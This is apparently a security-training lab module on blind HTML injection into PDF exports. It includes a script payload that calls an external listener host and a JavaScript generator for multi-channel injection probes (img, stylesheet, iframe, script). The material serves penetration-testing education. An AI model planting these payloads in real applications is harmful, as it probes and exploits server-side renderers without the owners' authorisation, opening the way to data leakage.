PDF export injection - Blind injection
Sometimes you know that the application renders your HTML, but you either cannot see the resulting PDF at all, or your injected markup does not fit into, or visibly appear in, the part of the document you can see. In that case the injection must be performed blind and the data leaked through another route, for example a callback to a server you control. This module explores that case.
In this module, we will solve the lab together. If you wish, you can stop reading and attempt to solve it yourself. Otherwise, you can follow the steps below at your own pace.
Vulnerability Verification
The application is almost the same as in the previous module, with the exception that this time the application does not allow us to download the generated PDF file. We must therefore verify the vulnerability by other means.
This is where Hakatemia's listener tool fits best. Let's start by creating a new listener URL and writing JavaScript code that calls it. A hit on the listener lets us verify two things:
- Is JavaScript execution allowed in the PDF renderer
- Is PDF generation happening on a system from which the external network can be reached, i.e. can the renderer make outbound requests to our listener
Sometimes the HTTP request does not arrive but a DNS query does. That can mean, for example, that a firewall in front of the renderer blocks outbound HTTP traffic while DNS resolution, which is typically allowed, still goes through. If neither an HTTP request nor DNS traffic appears on the listener, try other HTML elements that fetch resources without JavaScript, such as image and style resources. If those produce hits while the script does not, JavaScript execution is blocked; if nothing arrives at all, the renderer most likely has no outbound network access or the input is not being rendered.
We use the following code and place it in the comment field. After this, we send the profile for evaluation.
```html
<script>
// Blind probe: the only observable effect is the request arriving at the listener.
var x = new XMLHttpRequest();
x.open("GET", "https://z8u013a69c.hit.ha-listener.com");
x.send();
</script>
```

We see hits in the listener, so we have confirmed that the application is vulnerable and executes our JavaScript, and that the renderer can communicate with the outside world.
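In practice it is worth sending all the fallback channels from the paragraph above in one payload, each pointing at a distinct path on the same listener host, so that a single submission tells you which element the renderer actually processed. The following is an added example, not code from the lab or from Hakatemia's listener: `buildBlindProbe` generates such a payload, and `classifyHit` / `interpretHits` map the paths you later see in the listener log back to their meaning. The listener base URL and the `tag` value are placeholders; the example assumes only that the listener records the request path of each HTTP hit.

```javascript
// Added example (not from the original lab). Builds a multi-channel blind-injection
// probe and interprets listener hits. Assumption: the listener logs the request path.

// Each channel gets its own path suffix, so the listener log identifies the channel.
const CHANNELS = {
  js: "JavaScript executed (XMLHttpRequest)",
  img: "<img> resource fetched (no JavaScript needed)",
  css: "<link rel=stylesheet> resource fetched (no JavaScript needed)",
  iframe: "<iframe> navigated (no JavaScript needed)",
};

// listenerBase: e.g. "https://<id>.hit.ha-listener.com" (placeholder here).
// tag: a short unique token per test run, so stale hits from earlier runs are not confused
// with the current one. Restricted to [a-z0-9] so it is safe inside quoted attributes.
function buildBlindProbe(listenerBase, tag) {
  if (!/^[a-z0-9]+$/.test(tag)) {
    throw new Error("tag must be lowercase alphanumeric");
  }
  const base = listenerBase.replace(/\/+$/, ""); // strip trailing slash
  const url = (channel) => `${base}/${tag}-${channel}`;
  // Resource-loading tags first: they fire even if <script> is stripped or disabled.
  return [
    `<img src="${url("img")}">`,
    `<link rel="stylesheet" href="${url("css")}">`,
    `<iframe src="${url("iframe")}"></iframe>`,
    `<script>`,
    `var x = new XMLHttpRequest();`,
    `x.open("GET", "${url("js")}");`,
    `x.send();`,
    `</script>`,
  ].join("\n");
}

// Map one request path from the listener log (e.g. "/t1-img") back to its channel.
function classifyHit(requestPath, tag) {
  const m = requestPath.match(new RegExp(`^/${tag}-([a-z]+)$`));
  if (!m || !(m[1] in CHANNELS)) return null;
  return { channel: m[1], meaning: CHANNELS[m[1]] };
}

// Summarise a set of logged paths into the conclusion a tester needs.
function interpretHits(paths, tag) {
  const seen = new Set(
    paths.map((p) => classifyHit(p, tag)).filter(Boolean).map((h) => h.channel)
  );
  if (seen.has("js")) {
    return "JavaScript runs in the renderer and it has outbound HTTP";
  }
  if (seen.size > 0) {
    return "Renderer fetches resources but JavaScript is blocked or stripped";
  }
  return "No HTTP hits: check the DNS log; if nothing, assume no egress or input not rendered";
}

// Stand-alone usage with a placeholder listener and constructed log lines.
const payload = buildBlindProbe("https://example.invalid/", "t1");
console.log(payload);
console.log(interpretHits(["/t1-img", "/t1-css"], "t1"));
```

Because every channel shares one hostname, a DNS-only hit still proves outbound name resolution but cannot tell you which element fired; if your listener hands out per-hit subdomains, put the channel name in the host label instead of the path to keep that distinction at the DNS layer as well.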
